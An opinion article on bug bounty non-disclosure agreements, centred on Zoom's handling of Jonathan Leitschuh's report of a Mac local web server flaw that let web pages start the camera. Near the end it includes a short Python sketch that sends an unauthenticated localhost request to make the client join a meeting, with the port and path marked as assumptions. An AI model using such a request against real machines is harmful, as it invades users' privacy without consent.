Despite an organization’s best efforts to produce a service that runs flawlessly and is secure, software bugs can and do occur, and some are more serious than others.
Sometimes these bugs can go undetected even by the most experienced security teams, potentially resulting in a product that compromises its users’ digital security and leaves them exposed to cyberattacks. Many companies set up bug bounty programs to enlist cybersecurity researchers to help them locate vulnerabilities that may lurk undetected in their systems.
Essentially, the researcher hacks (ethically) into the vendor’s system to try to exploit any vulnerabilities that may exist. If the researcher discovers a vulnerability that poses a significant enough risk, he or she can collect a bug bounty worth hundreds of dollars, or even hundreds of thousands, depending on the severity of the bug. Bug bounty hunters often act as the unsung heroes of cybersecurity, holding organizations accountable for ensuring the digital security of consumers.
What happens, though, when an organization disagrees with a cybersecurity researcher over the severity of a vulnerability the researcher has uncovered? What happens when an organization attempts to avoid accountability by prohibiting the researcher from publicly disclosing his or her findings, or only agrees to pay a bug bounty on the condition that the researcher remains publicly silent about a vulnerability? When this happens, consumers’ digital security and personal privacy can be seriously jeopardized.
Bug bounty programs are essential to keeping the systems that run the software and applications consumers use every day secure and working properly. They incentivize cybersecurity researchers and ethical hackers to come forward and find vulnerabilities. It stands to reason that requiring bug bounty hunters to sign a non-disclosure agreement (NDA) is also an important and effective way to prevent any potentially serious vulnerabilities from being exposed publicly and exploited before they are patched.
That said, NDA provisions that prevent a researcher from ever publicly disclosing a vulnerability could, for example, provide little incentive for a company to properly address the fault, leaving users exposed to various cyberthreats.
Security researchers and bug bounty hunters do a great job of holding companies accountable for keeping their users safe and secure. But when companies engage in questionable NDA tactics with security researchers to skirt that accountability, user security can be put at substantial risk.
In light of the recent wave of high-profile data breaches and major security oversights involving some of the biggest names in tech, the public deserves much greater accountability from the companies they entrust with their information. Lawmakers across the globe have started cracking down on the industry and have been drafting legislation that aims to protect consumers while holding tech companies accountable for how they handle sensitive data. Top industry executives like Facebook’s Mark Zuckerberg, Microsoft’s Bill Gates, and Apple’s Tim Cook have all acknowledged the need for better consumer privacy protections as well as a greater sense of accountability for companies. At the same time, consumers have become increasingly distrustful of how companies manage their private data.
Considering this trend, Zoom’s handling of a cybersecurity researcher’s responsible disclosure of several serious vulnerabilities in its video-conferencing application is baffling. In March, cybersecurity researcher Jonathan Leitschuh contacted Zoom to notify the company of three major security vulnerabilities in its video-conferencing application for Mac computers. In addition to a bug that allowed a malicious attacker to launch a denial-of-service (DoS) attack on a user’s machine, and a bug that left a local web server installed on the user’s Mac even after the Zoom application was uninstalled, Leitschuh uncovered a far more alarming vulnerability that allowed a malicious third party to remotely and automatically enable an unsuspecting Mac user’s microphone and camera.
According to Leitschuh’s blog post, Zoom continually downplayed the severity of the vulnerabilities during their ongoing discussions. Leitschuh gave Zoom an industry-standard 90-day window in which to resolve the issues before proceeding with public disclosure. He even provided Zoom with what he called a “quick fix” solution to temporarily patch the camera vulnerability while the company finished work on rolling out the permanent fix. During a meeting prior to the 90-day public disclosure deadline, Zoom presented Leitschuh with its proposed fix. However, the researcher was quick to point out that the proposed solution was inadequate and could easily be bypassed.
At the end of the 90-day public disclosure deadline, Zoom implemented the temporary “quick fix” solution. Leitschuh wrote in his blog post:
"Ultimately, Zoom failed at quickly confirming that the reported vulnerability actually existed and they failed at having a fix to the issue delivered to customers in a timely manner. An organization of this profile and with such a large user base should have been more proactive in protecting their users from attack."
In its initial response to the public disclosure on the company blog, Zoom refused to acknowledge the severity of the video vulnerability and “ultimately...decided not to change the application functionality.” Although Zoom did eventually agree to completely remove the local web server that made the exploit possible (only after receiving significant public backlash following the disclosure), the company’s initial response, along with Leitschuh’s account of how Zoom chose to address his responsible disclosure, reveals that Zoom did not take the issue seriously and had little interest in properly resolving it.
Keep Quiet
Zoom attempted to buy Leitschuh’s silence on the issue by allowing him to benefit from the company’s bug bounty program only on the condition that he sign an excessively strict NDA. Leitschuh declined the offer. Zoom contended that the researcher was offered a financial bounty but declined it because of “non-disclosure terms.” What Zoom neglected to mention is that those terms would have prohibited Leitschuh from disclosing the vulnerabilities even after they were properly patched. This would have given Zoom zero incentive to patch a vulnerability the company had dismissed as insignificant.
NDAs are common practice in bug bounty programs, but demanding permanent silence from a researcher is akin to paying hush money, and ultimately benefits neither the researcher, nor users, nor the public in general. The role of the NDA should be to give the company a reasonable amount of time to address and fix a vulnerability before it is exposed to the public and potentially exploited by cybercriminals. Companies have a reasonable expectation of non-disclosure while working to fix a vulnerability, but primarily for the benefit of the user, not to save face in the court of public opinion. Researchers, for their part, have a reasonable expectation of a monetary reward, as well as public recognition for their efforts. Users have a reasonable expectation that the companies whose products they use are doing everything they can to secure their privacy. Finally, the public has a reasonable right to know what security vulnerabilities exist, what is being done to protect consumers from cyberthreats, and what consumers can do to protect themselves.
Conflicting Priorities
It would have been difficult for Zoom to handle this situation worse than it did. The company was so focused on creating a seamless user experience that it completely lost sight of the critical importance of protecting user privacy. “Video is central to the Zoom experience. Our video-first platform is a key benefit to our users around the world, and our customers have told us that they choose Zoom for our frictionless video communications experience,” the company stated in its response. To facilitate this “frictionless” video experience, however, Zoom resorted to installing a local web server that ran in the background on Mac computers and effectively bypassed a security feature in the Safari web browser. The feature in question requires user confirmation before a website can launch an application on a Mac; Zoom’s solution was to deliberately bypass it, putting its users’ privacy at risk to save them a click or two.
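In effect, that design turned app launching into something any web page could trigger: because the background server accepted plain, unauthenticated GET requests on localhost, a drive-by page (or, as in the sketch below, any local script standing in for one) could ask the client to join a meeting with no confirmation from the user. The following minimal Python sketch illustrates the class of attack only; the port, path, and query parameters shown are assumptions for illustration, not Zoom’s documented interface.

```python
# Minimal sketch of the attack class: an unauthenticated GET request to a
# helper server listening on localhost. In the real exploit the request came
# from a tag embedded in a malicious web page; here a plain script stands in.
# The port, path, and query parameters below are illustrative assumptions.
import urllib.request

LOCAL_HELPER = "http://localhost:19421"   # assumed port of the background web server
MEETING_ID = "1234567890"                 # attacker-chosen meeting number (hypothetical)

url = f"{LOCAL_HELPER}/launch?action=join&confno={MEETING_ID}"

try:
    # Because the server trusts anything arriving on localhost, no user
    # confirmation stands between this request and the client joining a meeting.
    urllib.request.urlopen(url, timeout=2)
except OSError:
    # No helper server is running on this machine, so nothing happens.
    pass
```

Removing the local server entirely, as Zoom eventually agreed to do, closes this avenue, because the browser’s own confirmation prompt once again stands between a web page and the native client.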
Only after the public backlash it received in the wake of the disclosure did the company take meaningful action. The company’s initial response suggested that it had no intention of changing the application’s functionality even in light of the significant vulnerabilities the application harbored. It seems the company was willing to prioritize user experience over user security. While a smooth user experience is undoubtedly beneficial for any online application, it certainly shouldn’t come at the expense of security and privacy.
To the company’s credit, co-founder and CEO Eric S. Yuan later acknowledged that Zoom handled the situation poorly and committed to doing better going forward. Yuan stated in a blog post that “we misjudged the situation and did not respond quickly enough — and that’s on us. We take full ownership and we’ve learned a great deal. What I can tell you is that we take user security incredibly seriously and we are wholeheartedly committed to doing right by our users,” adding also that “our current escalation process clearly wasn’t good enough in this instance. We have taken steps to improve our process for receiving, escalating, and closing the loop on all future security-related concerns.”
"we misjudged the situation and did not respond quickly enough — and that’s on us.
Ultimately, though, the reality remains that had the researcher agreed to the terms of the NDA Zoom presented to him and been prohibited from disclosing his findings, we very likely would never have heard anything about the vulnerability. Worse yet, the company might never have fixed the issue, leaving millions of users vulnerable to a serious invasion of privacy.